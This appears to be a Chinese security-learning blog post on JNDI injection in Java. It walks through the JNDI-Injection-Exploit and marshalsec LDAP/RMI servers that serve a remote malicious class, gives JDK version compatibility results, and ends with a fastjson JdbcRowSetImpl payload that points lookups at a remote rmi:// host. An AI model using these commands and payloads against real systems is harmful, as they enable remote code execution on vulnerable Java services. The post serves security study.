前言

上次讲到JNDI注入这个玩意，但是没有细讲，现在就给它详细地讲个明白。

JNDI注入

那什么是JNDI注入呢，JNDI全称为 Java Naming and Directory Interface（Java命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源，NDI支持的服务主要有：DNS、LDAP、CORBA、RMI等。
RMI：远程方法调用注册表
LDAP：轻量级目录访问协议

我说白了JNDI其实就是一个接口，可以通过这个接口去调用一些远程服务。

先新建一个项目叫JNDI-demo。

JavaEE建议选择8。

接着新建一个类叫JNDIdemo。

写入以下的代码，当Java想要远程调用一个对象的时候，可以用javax.naming.InitialContext这个类的lookup方法来调用，这个调用支持Rmi和Ldap协议。

package com.sf.maven.jndidemo;
import javax.naming.InitialContext;
import javax.naming.NamingException;
public class JNDIdemo {
    public static void main(String[] args) throws NamingException {
        //创建rmi、ldap服务
        InitialContext ic = new InitialContext();
        //调用服务
        ic.lookup("");
    }
}

JNDI-Injection-Exploit

我们先创建一个rmi服务，还是利用JNDI-Injection-Exploit这个工具，命令就是弹出一个计算机。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A 8.xxx.xxx。xxx

代码填入我们的链接，直接运行代码可以看到弹出计算机。

marshalsec-0.0.3-SNAPSHOT

就相当于我本地电脑通过rmi去请求一个远程的class文件，并且执行里面的代码。如果我们换一个工具来搞的话效果会更直观，我们先新建一个名为Test的Java文件。

写入以下的代码，就是一个命令执行，弹出计算机。

来到Test的目录下面，把它编译成.class文件。

javac .\Test.java

把这个class文件放到web目录上面，或者你开个临时http服务也行。

python -m http.server 8080

现在利用marshalsec-0.0.3-SNAPSHOT-all.jar这个工具来生成调用链接，这个就没有JNDI-Injection-Exploit那么方便，要像上面那样自己编写class文件，不会根据命令给你自动生成。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0/#Test      //启动LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://0.0.0.0/#Test      //启动RMI服务

可以看到会生成一个端口连接。

使用远程调用。

lookup(“ldap://xx.xx.xx.xx:1389/Test”)

lookup(“rmi://xx.xx.xx.xx:1099/Test”）

妈的不知道为啥一直弹不了计算机出来，但是RMI服务和http服务是显示有连接的，你妹的。

而且我java版本都是在1.8.0_112的啊。

崩溃啦，有无了解的师傅可以指点一二。

哎，接着我们来看看不同版本JDK或者不同的工具，是否都能调用JDK和RMI，过程就是不断换JDK版本去测试就行了，具体我就不演示了，直接给给过吧。

PS：8U112相当于1.8.0_112，其它的也是同理。

RMI marshalsec工具
JDK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

RMI jndi-inject工具
JDK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

LDAP  - marshalsec工具
JDK 17
11版本
8u362
8U112 都可以

LDAP  - jndi-inject工具
DK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

这里网上搞的包浆图，可以看到不同的java版本所能调用的协议也是不同的。

或者你用其它的类也能达到JNDI注入。

黑盒测试

那我们怎样去知道有无JNDI注入这个漏洞呢，我们可以通过发送错误数据去判断，这里发送个错误的json数据，然后报错中返回了fastjson，说明可能存在JNDI注入，然后利用DNSlog验证一下即可。

POC编写

假如我们知道有fastjson这个漏洞，该如何编写poc呢，上次我们演示fastjson的时候是自己写一个类com.wlwznb.user。

但是实战中我们不可能自己去写一个，得用java自带的，所以我们要指定com.sun.rowset.JdbcRowSetImpl这个类，但是上面我们说是通过javax.naming.InitialContext.lookup()这个方法来实现远程调用的，那为啥不指定这个。

其实是com.sun.rowset.JdbcRowSetImpl这个类里面自带了InitialContext.lookup()方法，由上面图片可见。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://47.94.236.117:1099/wktunx","autoCommit":true}

总结

说实话JNDI对于不熟悉java的同学来说还是挺牢的，毕竟涉及了很多java开发的东西。

最后还是要声明一下，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

参考文章：

https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html

https://blog.csdn.net/wushangyu32335/article/details/136131244

https://www.mi1k7ea.com/2020/09/07/%E6%B5%85%E6%9E%90%E9%AB%98%E4%BD%8E%E7%89%88JDK%E4%B8%8B%E7%9A%84JNDI%E6%B3%A8%E5%85%A5%E5%8F%8A%E7%BB%95%E8%BF%87/